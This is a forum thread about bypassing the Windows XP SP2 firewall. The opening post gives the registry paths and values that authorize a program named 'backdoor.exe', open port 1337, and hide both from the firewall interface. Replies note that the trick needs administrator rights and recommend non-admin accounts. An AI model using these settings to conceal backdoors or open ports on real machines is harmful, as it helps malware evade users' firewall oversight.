Hot Downloads

Welcome, Guest
Username: Password: Remember me

TOPIC: Bypassing Windows Firewall, XP SP2 example

Bypassing Windows Firewall, XP SP2 example 11 years 5 months ago #9121

  • ping
  • ping's Avatar
  • Offline
  • Distinguished Member
  • Posts: 181
  • Karma: 0
Recently i found this way to by pass the windows SP2 inbuilt firewall. This is for educational purpose strictly. So, here it goes

We can bypass windows firewall using registry.

Just open regedit.exe and go to
[code:1]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
[/code:1]

As you can see the sharedaccess service aka windows firewall contains the names of applications allowed for outbound connections.

Tto give access to the desired application we need to add similiar key:
[code:1]C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled[/code:1]

But then out "backdoor" will be listed in Firewall GUI allowed applications.

Anyway we may hide it by making this
[code:1]C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled:@xpsp2res.dll,-22019"[/code:1]

We can also open globally any port we want

[code:1]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List

[/code:1]

by adding similiar value inside this registry key
[code:1]"1337:TCP"="1337:TCP:*:Enabled:Name"[/code:1]

Where "Name" is the name we want to be showed in the GUI

To hide port from listing in the GUI mode we may make something like that

[code:1]1337:TCP:*:Enabled:@xpsp2res.dll,-22003[/code:1]

an then the port will be hidden from listing (XP SP2)..



It works on XP SP2 i didn't tested it on any other os.

This method is used by some malware /spyware manufacturers and together with rootkit it may be reallly dangerous.
The greatest pleasure in life is doing what people say you can not do..!!
The administrator has disabled public write access.

Ports 11 years 5 months ago #9123

  • TheBishop
  • TheBishop's Avatar
  • Offline
  • Moderator
  • Posts: 1719
  • Thank you received: 8
  • Karma: 5
Ouch! That's worth knowing
The administrator has disabled public write access.

Re: Bypassing Windows Firewall, XP SP2 example 11 years 5 months ago #9126

  • nske
  • nske's Avatar
  • Offline
  • Expert Member
  • Posts: 613
  • Karma: 0
Well, of course from an administrator account everything's possible! Firewall's rules had to be stored somewhere after all.. :)
The above would not work in a limited account, since access to the registry is prohibited.

This is nice that you described though, if nothing else to demonstrate how easily can a malware reconfigure the Windows firewall to allow themselves out and how many more considerations there are to take when having logged in as an administrator!
The administrator has disabled public write access.

Re: Bypassing Windows Firewall, XP SP2 example 11 years 5 months ago #9128

  • DaLight
  • DaLight's Avatar
  • Offline
  • Honored Member
  • Posts: 1302
  • Karma: 1
I second nske's comments. I run all my users in non-admin mode at work and at home! This I believe is the major reason behind spyware infections. Obviously this problem mainly exists in the Windows world where people are not so familiar with the concept of root and limited user accounts.
The administrator has disabled public write access.

Re: Bypassing Windows Firewall, XP SP2 example 11 years 5 months ago #9131

  • nske
  • nske's Avatar
  • Offline
  • Expert Member
  • Posts: 613
  • Karma: 0
Well, since Microsoft likes to push users to the direction it wants in everything (default software, default settings, etc), it would be a good idea to encourage this and some other security-conscious decisions during the installation.
After all, nobody would complain for having to relogin each time he needs to install some new software or configure something, as they complain now for having an unusable malware-infected system -besides, the procedure could be more transparent not requiring to disrupt a current login session. ;)

PS. And afterwards they could even patent this idea and sue the Linux community for billions! :lol:
The administrator has disabled public write access.
Time to create page: 0.082 seconds

CCENT/CCNA

Cisco Routers

  • SSL WebVPN
  • Securing Routers
  • Policy Based Routing
  • Router on-a-Stick

VPN Security

  • Understand DMVPN
  • GRE/IPSec Configuration
  • Site-to-Site IPSec VPN
  • IPSec Modes

Cisco Help

  • VPN Client Windows 8
  • VPN Client Windows 7
  • CCP Display Problem
  • Cisco Support App.

Windows 2012

  • New Features
  • Licensing
  • Hyper-V / VDI
  • Install Hyper-V

Linux

  • File Permissions
  • Webmin
  • Groups - Users
  • Samba Setup